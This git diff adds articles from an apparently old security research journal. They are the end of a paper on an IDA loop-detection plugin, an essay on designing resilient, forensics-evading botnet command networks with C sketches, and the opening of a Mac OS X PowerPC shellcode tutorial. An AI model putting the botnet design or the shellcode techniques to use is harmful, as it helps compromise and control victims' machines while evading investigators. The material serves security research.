When this +option is enabled the graph will contain information about the stack of the +function including the variables name, whether or not it is an argument, and +the size of the variable. This option is a great feature for static auditing. + + +Highlight Code + +This option is very similar to Highlight Function except instead of just +highlighting function calls within loops it will highlight all the code that is +executed within the loops. This makes it easier to read the loops in IDA View + + +Verbose Output + +This feature allows the user to see how the program is working and will give +more information about what the plug-in is doing. + + +Auto Commenting + +This option adds comments to loops nodes, such as where the loop begins, where +it exits, and other useful information so that the user doesn't have to +continually look at the graph. + + +All Loops Highlighting of Functions + +This feature will find every loop within the IDA database. It will then +highlight any call to any function within a loop. The highlighting is done +within the IDA View making navigation of code easier. + + +All Loops Highlighting of Code + +This option will find every loop within the database. It will then highlight +all segments of code involved in a loop. The highlighting of code will allow +for easier navigation of code within the IDA View. + + +Natural Loops + +This detection feature allows the user to only see natural loops. It may not +pick up all loops but is an educational implementation of the previously +discussed algorithm. + + +Recursive Function Calls + +This detection option will allow the user to see where recursive function calls +are located. + + +5.2) Known Issues + +There a couple of known issues with this plug-in. It does not deal with rep* +instructions, nor does it deal with mov** instructions that might result in +copied buffers. Future versions will deal with these instructions, but since +it is open-sourced the user can make changes as they see fit. Another issue is +that of ``no-interest''. By this the author means detecting loops that aren't +of interest or don't pose a security risk. These loops, for example, may be +just counting loops that don't write memory. Halvar Flake describes this topic +in his talk that was given at Blackhat Windows 2004. Feel free to read his +paper and make changes accordingly. The author will also update the plug-in +with these options at a later date. + + +5.3) Case Study: Zone Alarm + +For a case study the author chose Zone Alarm's vsdatant.sys driver. This +driver does a lot of the dirty work for Zone Alarm such as packet filtering, +application monitoring, and other kernel level duties. Some may wonder why it +would be worthwhile to find loops in a driver. In Zone Alarm's case, the user +can hope to find miscalculations in lengths where they didn't convert a signed +to unsigned value properly and therefore may cause an overflow when looping. +Anytime an application takes data in remotely that may be type-casted at some +point, there is always a great chance for loops that overflow their bounds. + +When analyzing the Zone Alarm driver the user needs to select certain options +to get a better idea of what is going on with loops. First, the user should +select verbose output and All Loops Highlighting of Functions to see if there +are any dangerous function calls within the loop. This is illustrated in +figure . + +After running through the loop detection phase, some interesting results are +found that are shown in figure . 
+ +Visiting the address 0x00011a21 in IDA shows the loop. To begin, the reader +will need to find the loop's entry point, which is at: + + .text:00011A1E jz short loc_11A27 + +At the loop's entry point, the reader will notice: + + .text:00011A27 push 206B6444h ; Tag + .text:00011A2C push edi ; NumberOfBytes + .text:00011A2D push 1 ; PoolType + .text:00011A2F call ebp ;ExAllocatePoolWithTag + +At this point, the reader can see that every time the loop passes through its +entry point it will allocate memory. To determine if the attacker can cause a +double free error, further investigation is needed. + + .text:00011A31 mov esi, eax + .text:00011A33 test esi, esi + .text:00011A35 jz short loc_11A8F + +If the memory allocation within the loop fails, the loop terminates correctly. +The next call in the loop is to ZwQuerySystemInformation which tries to acquire +the SystemProcessAndThreadsInformation. + + .text:00011A46 mov eax, [esp+14h+var_4] + .text:00011A4A add edi, edi + .text:00011A4C inc eax + .text:00011A4D cmp eax, 0Fh + .text:00011A50 mov [esp+14h+var_4], eax + .text:00011A54 jl short loc_11A1C + +This part of the loop is quite un-interesting. In this segment the code +increments a counter in eax until eax is greater than 15. It is obvious that +it is not possible to cause a double free error in this case because the user +has no control over the loop condition or data within the loop. This ends the +investigation into a possible double free error. + +Above is a good example of how to analyze loops that may be of interest. With +all binary analysis it is important to not only identify dangerous function +calls but to also identify if the attacker can control data that might be +manipulated or referenced within a loop. + + +6) Conclusion + +During the course of this paper, the reader has had a chance to learn about the +different types of loops and some of the method of detecting them. The reader +has also gotten an in-depth view of the new IDA plug-in released with this +article. Hopefully now when the reader sees a loop, whether in code or binary, +the reader can explore the loop and determine if it is a security risk or not. + + +Bibliography + +Tarjan, R. E. 1974. Testing flow graph reducibility. J +Comput. Syst. Sci. 9, 355-365. + +Sreedhar, Vugranam, Guang Gao, Yong-Fong Lee. Identifying +loops using DJ graphs. +http://portal.acm.org/citation.cfm?id=236114.236115 + +Flake, Halvar. Automated Reverse Engineering. +http://www.blackhat.com/presentations/win-usa-04/bh-win-04-flake.pdf diff --git a/uninformed/1.5.txt b/uninformed/1.5.txt new file mode 100644 index 0000000..d9214b6 --- /dev/null +++ b/uninformed/1.5.txt @@ -0,0 +1,572 @@ +Social Zombies - Aspects of Trojan Networks +May, 2005 +warlord +warlord / nologin.org + + +1) Introduction + + +While I'm sitting here and writing this article, my firewall is +getting hammered by lots and lots of packets that I never asked for. +How come? In the last couple of years we saw the internet grow into +a dangerous place for the uninitiated, with worms and viruses +looming almost everywhere, often times infecting systems without +user interaction. This article will focus on the subclass of malware +commonly referred to as worms, and introduce some new ideas to the +concept of worm networks. + +2) Worm Infection Vectors + + +The worms around today can mostly be put into one the four +categories discussed in the following sections. + +2.1) Mail + +The mail worm is the simplest type of worm. 
It's primary +mode of propagation is through social engineering. By sending large +quantities of mail with content that deceives people and/or triggers +their curiosity, recipients are tricked into running an attached +program. Once executed, the program will send out copies of itself +via email to recipients found in the victims address book. This type +of worm is usually stopped quickly when antivirus companies update +their signature files, and mail servers running those AV products +start filtering the worm mails out. Users, in general, are becoming +more and more aware of this type of malware, and many won't run +attachments sent in mail anymore. Regardless, this method of +infection still manages to be successful. + + +2.2) Browser + +Browser-based worms, which primarily work against Internet Explorer, +make use of vulnerabilities that exist in web-browsers. What +generally happens is that when a users visits a malicious website, +an exploit will make Internet Explorer download and execute code. As +there are well known vulnerabilities in Internet Explorer at all +times that are not yet fixed, the bad guys usually have a couple of +days or weeks to spread their code. Of course, the infection rate +heavily depends on the number of visitors on the website hosting the +exploit. One approach that has been used in the past to gain access +to a wider 'audience' involved sending mail to thousands of users in +an attempt to get the users to visit a malicious website. Another +approach involved hacking advertisement companies and changing their +content in order to make them serve exploits and malware on high +profile sites. + + +2.3) Peer to Peer + +The peer to peer worm is quite similar to the mail worm; it's all +about social engineering. Users hunting for the latest mp3s or +pictures of their most beloved celebrity find similarly named +programs and scripts, trying to deceive the user to download and +execute them. Once active on the users system, the malcode will make +sure it's being hosted by the users p2p application to spread +further. Even if downloaded, host based anti-virus scanners with +recent signatures will catch most of these programs before they can +be run. + + +2.4) Active + +This one is the most dangerous worm, as it doesn't require any sort +of user interaction at all. It also requires the highest level of +skill to write. Active worms spread by scanning the internet for one +or more types of vulnerabilities. Once a vulnerable target is +found, an exploit attempt is made that, if successful, results in +the uploading of the worm to the attacked site where propagation can +continue in the same form. These worms are usually spotted first by +an increasing number of hosts scanning the internet, most often +scanning for a single port. These worms also usually exploit +weaknesses that are well-known to the public for hours, days, weeks +or months. Examples of this type of worm include the Wank worm, +Code Red, Sadmind, SQL Slammer, Blaster, Sasser and others. As the +use of firewalls and NAT routers increases, and as anti-exploit +techniques like the one employed by Windows XP SP2 become more +common, these worms will find less hosts to infect. To this point, +from the time of this writing, it's been a while since the last big +active worm hit the net. + + +Other active infection vectors include code spreading via unset or +weak passwords on CIFS Common Internet File System. The +protocol used to exchange data between Windows hosts via network +shares. 
shares, IRC and instant messaging networks, Usenet, and +virtually every other data exchange protocol. + +3) Motives + +3.1) Ego + +Media attention often is a major motivation behind a worm. Coders +bolstering their ego by seeing reports on their worm on major sites +on the internet as well as tv news and newspapers with paniced +warnings of the latest doomsday threat which may take down the +planet and result in a 'Digital Pearl Harbor' seems +to be quite often the case. Huge media attention usually also means +huge law enforcement attention, and big efforts will be made to +catch the perpetrator. Though especially wide open (public) WIFI +networks can make it quite difficult to catch the perpetrator by +technological means, people boasting on IRC and, as in the case of +Sasser, bounties, can quickly result in the worm's author being +taken into custody. + + +3.2) DDoS + +The reason for a DDoS botnet is usually either the wish to have +enough firepower to virtually shoot people/sites/organizations off +the net, or extortion, or a combination of both. The extortion of +gambling websites before big sports events is just one example of +many cases of extortion involving DDoS. The attacker usually takes +the website down for a couple of hours to demonstrate his ability to +do so whenever it pleases him, and sends a mail to the owner of the +website, asking for money to keep the firepower away from his site. +This sort of business model is well known for millenia, and merely +found new applications online. + + +3.3) Spamming + +This one is also about money in the end. Infected machines are +(ab)used as spam zombies. Each machine sends their master's +unsolicited mail to lots and lots of unwilling recipients. The +owners of these systems usually offer their services to the spam +industry and thus make money of it. + + +3.4) Adware + +Yet another reason involving money. Just like on TV and Google, +advertisements can be sold. The more people seeing the +advertisement, the more money can be requested from the people that +pay for their slogan to be displayed on some end users Windows. (Of +course, it could be Linux and MacOS too, but, face it, no adware +attacks those) + + +3.5) Hacking + +A worm that infects and backdoors a couple thousand hosts is a great +way to quickly and easily obtain data from those systems. Examples +of data that may be worth stealing includes accounts for online +games, credit card numbers, personal information that can be used in +identity theft scams, and more. There has even been a report that +items of online games were being stolen to sell those later on +E-bay. Already having compromised one machine, enhancing the +influence into some network can be much easier of course. Take for +example the case of a heavily firewalled company. A hacker can't get +inside using an active approach, but notices that one of his malware +serving websites infected a host within that network. Using a +connect-back approach, where the infected node connects to the +attacker, a can tunnel can be built through the firewall thereby +allowing the attacker to reach the internal network. + +4) Botnets + +While I did mention DDoS and spam as reasons for infection already, +what I left out so far was the infrastructure of hundreds or +thousands of compromised machines, which is usually called a +botnet. Once a worm has infected lots of systems, an +attacker needs some way to control his zombies. 
Most often the nodes +are made to connect to an IRC server and join a (password protected) +secret channel. Depending on the malware in use, the attacker can +usually command single or all nodes sitting on the channel to, for +example, DDoS a host into oblivion, look for game CD keys and dump +those into the channel, install additional software on the infected +machines, or do a whole lot of other operations. While such an +approach may be quite effective, it has several shortcomings. + +- IRC is a plaintext protocol. + + Unless every node builds an SSL tunnel to an SSL-capable IRCD, + everything that goes on in the channel will be sent from the IRCD to + all nodes connected, which means that someone sniffing from an + infected honeypot can see everything going on in the channel, + including commands and passwords to control the botnet. Such a + weakness allows botnets to be stolen or destroyed (f.ex. by issuing + a command to make them connect to a new IRCD which is on IP + 127.0.0.1). + +- It's a single point of failure. + + What if the IRCD goes down because some victim contacted the admin + of the IRC server? On top of this, an IRC Op (a IRC administrator) + could render the channel inaccessible. If an attacker is left + without a way to communicate with all of the zombie hosts, they + become useless. + +A way around this dilemma is to make use of dynamic DNS sites like +www.dyndns.org. Instead of making the zombies connect to +irc.somehost.com, the attacker can install a dyndns client which +then allows drones to reference a hostname that can be directed to a +new address by the attacker. This allows the attacker to migrate +zombies from one IRC server to the next without issue. Though this +solves the problem of reliability, IRC should not be considered +secure enough to operate a botnet successfully. + + +The question, then, is what is a better solution? It seems the +author of the trojan Phatbot already tried to find a way +around this problem. His approach was to include peer to peer +functionality in his code. He ripped the code of the P2P project +``Waste'' and incorporated it into his creation. The problem was, +though, that Waste itself didn't include an easy way to exchange +cryptographic keys that are required to successfully operate the +network, and, as such, neither did Phatbot. The author is not aware +of any case where Phatbot's P2P functionality was actually used. +Then again, considering people won't run around telling everyone +about it (well, not all of them at least), it's possible that such a +case is just not publicly known. + + +To keep a botnet up and running, it requires reliability, +authentication, secrecy, encryption and scalability. How can all of +those goals be achieved? What would the basic functionality of a +perfect botnet require? 
Consider the following points: + + - An easy way to quickly send commands to all nodes + - Untraceability of the source IP address of a command + - Impossibile to judge from an intercepted command packet which node it was + addressed to + - Authentication schemes to make sure only authorized personnel operate the + zombie network + - Encryption to conceal communication + - Safe software upgrade mechanisms to allow for functionality enhancements + - Containment; so that a single compromised node doesn't endanger the entire + network + - Reliability; to make sure the network is still up and running when most of + its nodes have gone + - Stealthiness on the infected host as well as on the network + +At this point one should distinguish between unlinked and +linked, or passive, botnets. Unlinked means each node is on +its own. The nodes poll some central resource for information. +Information can include commands to download software updates, to +execute a program at a certain time, or the order a DDoS on a given +target machine. A linked botnet means the nodes don't do anything by +themselves but wait for command packets instead. Both approaches +have advantages and disadvantages. While a linked botnet can react +faster and may be more stealthy considering the fact that it doesn't +build up periodic network connections to look out for commands, it +also won't work for infected nodes sitting behind firewalls. Those +nodes may be able to reach a website to look for commands, which +means an unlinked approach would work for them, but command packets +like in the linked approach won't reach them, as the firewall will +filter those out. Also, consider the case of trying to build up a +botnet with the next Windows worm. Infected Windows machines are +generally home users with dynamic IP addresses. End-user machines +change IPs regularly or are turned off because the owner is at work +or on a hunting weekend. Good luck trying to keep an up-to-date list +of infected IPs. So basically, depending on the purpose of the +botnet, one needs to decide which approach to use. A combination of +both might be best. The nodes could, for example, poll a resource of +information once a day, where commands that don't require immediate +attention are waiting for them. On the other hand if there's +something urgent, sending command packets to certain nodes could +still be an option. Imagine a sort of unlinked botnet. No node knows +about another node and nor does it ever contact one of its brothers, +which perfectly achieves our goal of containment. These nodes +periodically contact what the author has labeled a resource +of information to retrieve their latest orders. What could such a +resource look like? + +The following attributes are desirable: + + - It shouldn't be a single point for failure, like a single host that makes + the whole system break down once it's removed. + - It should be highly anonymous, meaning connecting there shouldn't be + suspicious activity. To the contrary, the more people requesting information + from it the better. This way the nodes' connections would vanish in the + masses. + - The system shouldn't be owned by the botnet master. Anonymity is one of the + botnet's primary goals after all. + - It should be easy to post messages there, so that commands to the botnet can + be sent easily. + +There are several options to achieve these goals. 
It could be: + + - Usenet: Messages posted to a large newsgroup which contain + steganographically hidden commands that are cryptographically signed + achieves all of the above mentioned goals. + - P2P networks: The nodes link to a server once in a while and, like hundreds + of thousands of other people, search for a certain term (``xxx''), and find + command files. File size could be an indicator for the nodes that a certain + file may be a command file. + - The Web itself: This one would potentially be slow, but of course it's also + possible to setup a website that includes commands, and register that site + with a search engine. To find said site, the zombies would connect to the + search engine and submit a keyword. A special title of the website would + make it possible to identify the right page between thousands of other hits + on the keyword, without visiting each of them. + + + +Using those methods, it would be possible to administer even large +botnets without even having to know the IP adresses of the nodes. +The ``distance'' between botnet owner and botnet drone would be as +large as possible since there would be no direct connection between +the two. These approaches also face several problems, though: + + +How would the botnet master determine the number of infected hosts +that are up and running? Only in the case of the website would +estimation of the number of nodes be possible by inspecting the +access logs, even logging were to be enabled. In the case of the +Usenet approach a command of ``DDoS Ebay/Yahoo/Amazon/CNN'' might +just reach the last 5 remaining hosts, and the attacker would only +be left with the knowledge that it somehow didn't work. The problem +is, however, that the attacker would not know the number of zombies +that would actually take part in the attack. The same problem occurs +with the type and location of the infected hosts. Some might be high +profile, such as those connecting from big corporations, game +developers, or financial institutions. The attacker might be +interested in abusing those for something other than Spam and DDoS, +if he knew about them in particular. If the attacker wants to bounce +his connections over 5 of his compromised nodes to make sure he +can't be traced, then it is required that he be able to communicate +with 5 nodes only and that he must know address information about +the nodes. If the attacker doesn't have a clue which IP addresses +his nodes have, how can he tell 5 of them where to connect to? +Besides the obvious problem of timing, of course. If the nodes poll +for a new command file once every 24 hours, he'd have to wait 24 +hours in the worst case until the last node finds out it's supposed +to bind a port and forward the connection to somewhere else. + + +4.1) The Linked Network + +Though I called this approach a passive network, as the nodes idle +and wait for commands to come to them, this type of botnet is in +fact quite active. The mechanisms described now will not (easily) +work when most of the nodes are on dynamic IP addresses. It is thus +more interesting for nodes installed after exploiting some kind of +server software. Of course, while not solving the uptime problem, a +rogue dyndns account can always give a dynamic IP a static hostname. + + + +This kind of network focuses on all of its nodes forming some kind +of self-organizing peer to peer network. A node that infects some +other host can send over the botnet program and make the new host +link to itself, thus becoming that node's parent. 
This technique can +make the infected hosts form a sort of tree structure over time, as +each newly infected host tries to link to the infecting host. +Updates, information, and commands can be transmitted using this +worm network to reach each node, no matter which node it was sent +from, as each node informs both child nodes as well as its parent +nodes. In its early (or final) stages, a network of this type might +look like this piece of ascii art: + + Level + 0 N + / \ + 1 N N + / \ / + 2 N N N + +To make sure a 'successful' node that infects lots of hosts doesn't +become the parent of all of those hosts, nodes must refuse link +requests from child nodes after a certain number have been linked +(say 5). The parent can instead in form the would-be child to link +to one of its already established children instead. By keeping track +of the number of nodes linked to each location in the tree, a parent +can even try to keep the tree thats hierarchically below it well +balanced. This way a certain node would know about its parent and up +to 5 children, thus keeping the number of other hosts that someone +who compromises a node rather low, while still making sure to have a +network that's as effective as possible. Depending on the number of +nodes in the entire network, the amount of children that may link to +a parent node could be easily changed to make the network scale +better. As each node may be some final link as well as a parent +node, every host runs the same program. There's no need for special +'client' and 'server' nodes. + + +Whats the problem with a tree structure? Well, what if a parent +fails? Say a node has 3 children, each having 2 children of its own. +Now this node fails because the owner decides to reinstall the host. +Are we left with 3 networks that can't communicate with each other +any more? Not necessarily. While possibly giving a forensics expert +information on additional hosts, to increase reliability each node +has to know about at least one more upstream node that it can try to +link to if its parent is gone. An ideal candidate could be the +parent's parent. In order to make sure that all nodes are still +linked to the network, a periodic (once a day) sort of ``ping'' +through the entire network has to happen in any case. By giving a +child node the IP of its ``grandparent'', the direct parent of the +child node always knows that the fail-over node, the one its kids +will try to link to if it should fail, is still up and running. + + +Though this may help to address the issue of parent death, another +issue remains. If the topmost node fails, there are no more +upstream nodes that the children could link to. Thats why in this +case the children should have the ip of one(!) of its siblings as +the fail-over address so that they can make this one the new top +node in the case of a fail-over condition. Making use of the +node-based ping, each node also knows how many of its children are +still up and running. By including this number into the ping sent to +the parent, the topmost node could always tell the number of linked +hosts. In order to not have to rely on connecting to the topmost +node to collect this type of information, a simple command can be +implemented to make the topmost node report this info to any node on +the network that asks for it. Using a public key stored into all the +nodes, it's even possible to encrypt every piece of information +thats destined for the botnet owner, making sure that no one besides +the owner can decrypt the data. 
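
To make the linking rules above concrete, the bookkeeping each node would need
is roughly the following. This is only a sketch of the data structure being
described: the limit of 5 children, the fail-over address and the per-child
subtree counts come from the text, while all names and types are invented for
illustration.

#include <netinet/in.h>

#define MAX_CHILDREN 5          /* fan-out limit discussed above */

struct drone {
    struct in_addr parent;      /* node we are linked to */
    struct in_addr failover;    /* usually the parent's parent */
    struct in_addr child[MAX_CHILDREN];
    int            kids;                  /* children currently linked */
    int            subtree[MAX_CHILDREN]; /* hosts reported below each child */
};

/*
 * Handle a link request from a newly infected host.  Returns 1 and
 * records the newcomer if a slot is free; otherwise returns 0 and
 * writes the least loaded child into *redirect so the newcomer can
 * link there instead, keeping the tree roughly balanced.
 */
int handle_link_request(struct drone *self, struct in_addr newcomer,
                        struct in_addr *redirect)
{
    int i, least = 0;

    if (self->kids < MAX_CHILDREN) {
        self->child[self->kids]   = newcomer;
        self->subtree[self->kids] = 1;
        self->kids++;
        return 1;
    }

    for (i = 1; i < MAX_CHILDREN; i++)
        if (self->subtree[i] < self->subtree[least])
            least = i;

    *redirect = self->child[least];
    return 0;
}

The daily ping described above would simply sum the subtree counters on the
way up, which is how the topmost node can report the size of the whole
network.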
Although this type of botnet may give a forensics expert or someone with a
sniffer information on other nodes that are part of the network, it also
offers fast response times and more flexibility in the (ab)use of the
network compared to the previous approach with the unlinked nodes. It's a
sort of trade-off between the biggest possible level of anonymity on one
hand, and flexibility on the other. It is a huge step up compared to all of
the zombies sitting on IRC servers right now, where a single channel
contains the zombies of the entire botnet. Employing cryptography to store
the IPs of the child and parent nodes, and keeping those IPs only in RAM,
mitigates the problem further.

Once a drone network of this type has been established with several hundred
hosts, there are lots of possibilities for putting it to use. To conceal the
originating IP address of a connection, hopping over several nodes of the
drone network to a target host can be easily accomplished. A command packet
tells one node to bind a port. Once it receives a connection on it, it is
told to command a second node to do the same, and from then on node 1
forwards all the traffic to node 2. Node 2 does the same, and forwards to
node 3, then 4, maybe 5, until finally the last node connects to the
intended destination IP. By encrypting the entire connection from the
original source IP address up to the last node, a possible investigator
sniffing node 2 will not see the commands (and thus the IP addresses) which
tell node 3 to connect to node 4, node 4 to node 5, and of course especially
not the destination host's address. An idle timeout makes sure that
connections don't stay up forever.

As manually updating several hundred or thousand hosts is tedious work, an
easy updating system should be coded into the nodes. There are basically two
possible ways to realize this. A command, distributed from node to node all
over the network, could make each node replace itself with a newer version
which it may download from a certain HTTP address. The other way is by
updating the server software on one node, which in turn distributes this
update to all the nodes it's linked to (children and parent), which do just
the same. Cryptographic signatures are a must of course to make sure someone
doesn't replace all of the precious nodes with SETI@home. Vlad902 suggested
a simple and effective way to do that. Each node gets an MD5 hash hardcoded
into it. Whenever someone offers a software update, it will download the
first X bytes and see whether they hash to the hardcoded value. If they do,
the update will be installed. Of course, a forensics expert may extract the
hash out of an identified node. However, due to the nature of cryptographic
hashes, he won't be able to tell which byte sequence generates that hash.
This will prevent the forensics expert from creating a malicious update to
take down the network. As the value used to generate the hash has to be
considered compromised after an update, each update has to supply a new hash
value to look out for.

Further security mechanisms could include making the network completely
memory resident, with parents keeping track of their kids and reinfecting
them if necessary. What never hits the hard disk can obviously not be found
by forensics. Also, commands should be time-stamped to make sure a certain
command will only work once, and replay attacks (sending a sniffed command
packet to trigger a response from a node) will fail.
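The update check suggested by Vlad902 above is simple enough to sketch in a
few lines of C. The snippet below assumes OpenSSL's MD5() routine and uses
an invented constant for the number of bytes that get hashed; it is meant as
an illustration of the idea, not as code from an actual node.

#include <stddef.h>
#include <string.h>
#include <openssl/md5.h>

#define UPDATE_CHECK_BYTES 4096   /* the "first X bytes" mentioned above */

/* Digest hardcoded into the node; replaced with each accepted update. */
static unsigned char trusted_digest[MD5_DIGEST_LENGTH] = {
    /* ... filled in at build time ... */
};

/* Return 1 if the first UPDATE_CHECK_BYTES of the downloaded image
 * hash to the hardcoded value, 0 otherwise. */
static int update_is_trusted(const unsigned char *image, size_t image_len)
{
    unsigned char digest[MD5_DIGEST_LENGTH];

    if (image_len < UPDATE_CHECK_BYTES)
        return 0;

    MD5(image, UPDATE_CHECK_BYTES, digest);
    return memcmp(digest, trusted_digest, MD5_DIGEST_LENGTH) == 0;
}

As noted above, the hashed prefix has to be considered compromised once an
update has shipped, so each accepted update would also carry the digest that
the next one is checked against.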
Using public key cryptography to sign and encrypt data and communication is
always a nice idea too, but it also has two disadvantages:

 - It usually produces quite a big overhead to incorporate into the code.
 - Holding the one and only private key matching a public key that's been
   found on hundreds of hacked hosts is quite incriminating evidence.

An additional feature could be the incorporation of globally unique
identifiers into the network, providing each node with a unique ID that's
set upon installation on each new victim. While the network master would
have to keep track of host addresses and unique IDs, he could use this
feature to his advantage. Imagine a sort of traceroute within the node
network. The master wants to know where a certain host is linked to. Every
node knows the IDs of all of the child nodes linked hierarchically below it.
So he asks the topmost node to find out the path to the node he's interested
in. The topmost node realizes it's linked somewhere under child 2, and in
turn asks child 2. This node knows it's linked somewhere below child 4, and
so on and so on. In the end, the master gets his information, a couple of
IDs, while no node that's not directly linked to another gets to know the
IPs of further hosts that are linked to the network.

Since a portscan shouldn't reveal a compromised host, a raw socket must be
used to sniff command packets off the wire. Also, command packets should be
structured as unsuspiciously as possible, to make it look like the host just
got hit by yet another packet of ``internet background noise''. DNS replies
or certain values in TCP SYN packets could do the trick.


4.2) The Hybrid

There is a way to combine the anonymity of an unlinked network with the
quick response time of the linked approach. This can be done by employing a
technique first envisioned in the description of a so-called ``Warhol
Worm''. While no node knows anything about other nodes, the network master
keeps track of the IPs of infected hosts. To distribute a command to a
couple or maybe all of the nodes, he first of all prepares an encrypted file
containing the IPs of all active nodes, and combines that with the command
to execute. He then sends this command file to the first node on the list.
This node executes the command, takes itself off the list, and goes top to
bottom through the list until it finds another active node, which it
transmits the command file to. This way each node will only get to know
about other nodes when receiving command files, which are subsequently
erased after the file has been successfully transmitted to another node. By
addressing certain nodes by their unique IDs, it's even possible to make
certain nodes take different actions than all the others. By preparing
several different files and sending them to different nodes right from the
start, quite a fast distribution time can be achieved. Of course, should
someone manage not only to sniff the command file but also to decrypt it, he
has an entire list of infected hosts. Someone sniffing a node will still
also see an incoming connection from somewhere, and an outgoing connection
to somewhere else, and thus get to know about 2 more nodes. That's just the
same as depicted in the passive approach. What's different is that a binary
analysis of a node will not divulge information on another host of the
network.
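For illustration, the forwarding step that each node would perform on
receiving such a command file might look like the following sketch; the
helper functions and the structure layout are hypothetical.

#include <stddef.h>

struct command_file {
    unsigned int *node_ips;   /* remaining active nodes, self removed */
    size_t        node_count;
    const void   *payload;    /* the command itself */
    size_t        payload_len;
};

/* Hypothetical helpers: try_send() returns 1 if the file was delivered
 * to ip; secure_erase() removes local traces of the file. */
extern int  try_send(unsigned int ip, const struct command_file *cf);
extern void secure_erase(struct command_file *cf);

static void forward_command_file(struct command_file *cf)
{
    /* Walk the list top to bottom until one node accepts the file. */
    for (size_t i = 0; i < cf->node_count; i++) {
        if (try_send(cf->node_ips[i], cf))
            break;
    }

    /* Erase local traces once the file has been passed on. */
    secure_erase(cf);
}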
As sniffing is probably more of a threat than binary analysis though, and
considering a linked network offers way more flexibility, the Hybrid is most
likely an inferior approach.


5) Conclusion

When it comes to botnets, malcode development is still in its infancy, and
while today's networks are very basic and easily detected, the reader should
by now have realized that there are far better and stealthier ways to link
compromised hosts into a network. And who knows: maybe one or more advanced
networks are already in use today, and even though some of their nodes have
been spotted and removed, the network itself has simply not been identified
as such yet.


Bibliography

The Honeynet Project. Know Your Enemy: Tracking Botnets.
http://www.honeynet.org/papers/bots/

Weaver, Nicholas C. Warhol Worms: The Potential for Very
Fast Internet Plagues.
http://www.cs.berkeley.edu/~nweaver/warhol.html

Paxson, Vern, Stuart Staniford, and Nicholas Weaver. How to
0wn the Internet in Your Spare Time.
http://www.icir.org/vern/papers/cdc-usenix-sec02/

Zalewski, Michael. Writing Internet Worms for Fun and
Profit.
http://www.securitymap.net/sdm/docs/virus/worm.txt

diff --git a/uninformed/1.6.txt b/uninformed/1.6.txt
new file mode 100644
index 0000000..714e29c
--- /dev/null
+++ b/uninformed/1.6.txt
@@ -0,0 +1,510 @@

Mac OS X PPC Shellcode Tricks
H D Moore
hdm[at]metasploit.com
Last modified: 05/09/2005

0) Foreword

Abstract:

Developing shellcode for Mac OS X is not particularly difficult, but there
are a number of tips and techniques that can make the process easier and
more effective. The independent data and instruction caches of the PowerPC
processor can cause a variety of problems with exploit and shellcode
development. The common practice of patching opcodes at run-time is much
more involved when the instruction cache is in incoherent mode. NULL-free
shellcode can be improved by taking advantage of index registers and the
reserved bits found in many opcodes, saving space otherwise taken by
standard NULL evasion techniques. The Mac OS X operating system introduces a
few challenges to unsuspecting developers; system calls change their return
address based on whether they succeed and oddities in the Darwin kernel can
prevent standard execve() shellcode from working properly with a threaded
process. The virtual memory layout on Mac OS X can be abused to overcome
instruction cache obstacles and develop even smaller shellcode.

Thanks:

The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx,
and the entire Uninformed Journal staff.

1) Introduction

With the introduction of Mac OS X, Apple has been viewed with mixed feelings
by the security community. On one hand, the BSD core offers the familiar
Unix security model that security veterans already understand. On the other,
the amount of proprietary extensions, network-enabled software, and growing
mass of advisories is giving some cause for concern. Exploiting buffer
overflows, format strings, and other memory-corruption vulnerabilities on
Mac OS X is a bit different from what most exploit developers are familiar
with. The incoherent instruction cache, combined with the RISC fixed-length
instruction set, raises the bar for exploit and payload developers.

On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac
for Fun and Profit".
B-r00t's paper covered the basics of Mac OS X shellcode development and
built on the PowerPC work by LSD, Palante, and Ghandi. This paper is an
attempt to extend, rather than replace, the material already available on
writing shellcode for the Mac OS X operating system. The first section
covers the fundamentals of the PowerPC architecture and what you need to
know to start writing shellcode. The second section focuses on avoiding NULL
bytes and other characters through careful use of the PowerPC instruction
set. The third section investigates some of the unique behavior of the Mac
OS X platform and introduces some useful techniques.

2) PowerPC Basics

The PowerPC (PPC) architecture uses a reduced instruction set consisting of
32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can
only be executed by the processor if the opcode is word-aligned in memory.


2.1) Registers

PowerPC processors have thirty-two 32-bit general-purpose registers
(r0-r31), thirty-two 64-bit floating-point registers (f0-f31), a link
register (lr), a count register (ctr), and a handful of other registers for
tracking things like branch conditions, integer overflows, and various
machine state flags. (64-bit PowerPC processors have 64-bit general-purpose
registers, but still use 32-bit opcodes.) Some PowerPC processors also
contain a vector-processing unit (AltiVec, etc), which can add another
thirty-two 128-bit registers to the set.

On the Darwin/Mac OS X platform, r0 is used to store the system call number,
r1 is used as a stack pointer, and r3 to r7 are used to pass arguments to a
system call. General-purpose registers between r3 and r12 are considered
volatile and should be preserved before the execution of any system call or
library function.

;;
;; Demonstrate execution of the reboot system call
;;
main:
    li r0, 55           ; #define SYS_reboot 55
    sc

2.2) Branches

Unlike the IA32 platform, PowerPC does not have a call or jmp instruction.
Execution flow is controlled by one of the many branch instructions. A
branch can redirect execution to a relative address, absolute address, or
the value stored in either the link or count registers. Conditional branches
are performed based on one of four bit fields in the condition register. The
count register can also be used as a condition for branching and some
instructions will automatically decrement the count register. A branch
instruction can automatically set the link register to be the address
following the branch, which is a very simple way to get the absolute address
of any relative location in memory.

;;
;; Demonstrate GetPC() through a branch and link instruction
;;
main:

    xor. r5, r5, r5     ; xor r5 with r5, storing the value in r5
                        ; the condition register is updated by the . modifier
ppcGetPC:
    bnel ppcGetPC       ; branch if condition is not-equal, which will be false
                        ; the address of ppcGetPC+4 is now in the link register

    mflr r5             ; move the link register to r5, which points back here


2.3) Memory

Memory access on PowerPC is performed through the load and store
instructions. Immediate values can be loaded to a register or stored to a
location in memory, but the immediate value is limited to 16 bits. When
using a load instruction on a non-immediate value, a base register is used,
followed by an offset from that register to the desired location.
Store instructions work in a similar fashion; the value to be stored is
placed into a register, and the store instruction then writes that value to
the destination register plus an offset value. Multi-word memory
instructions exist, but are considered bad practice to use, since they may
not be supported in future PowerPC processors.

Since each PowerPC instruction is 32 bits wide, it is not possible to load a
32-bit address into a register with a single instruction. The standard
method of loading a full 32-bit value requires a load-immediate-shift (lis)
followed by an or-immediate (ori). The first instruction loads the high 16
bits, while the second loads the lower 16 bits. (Some people prefer to use
add-immediate-shift against the r0 general-purpose register; r0 has a
special property in that, anytime it is used for addition or subtraction, it
is treated as a zero regardless of its current value. 64-bit PowerPC
processors require five separate instructions to load a full 64-bit
immediate value into a general-purpose register.) This 16-bit limitation
also applies to relative branches and every other instruction that uses an
immediate value.

;;
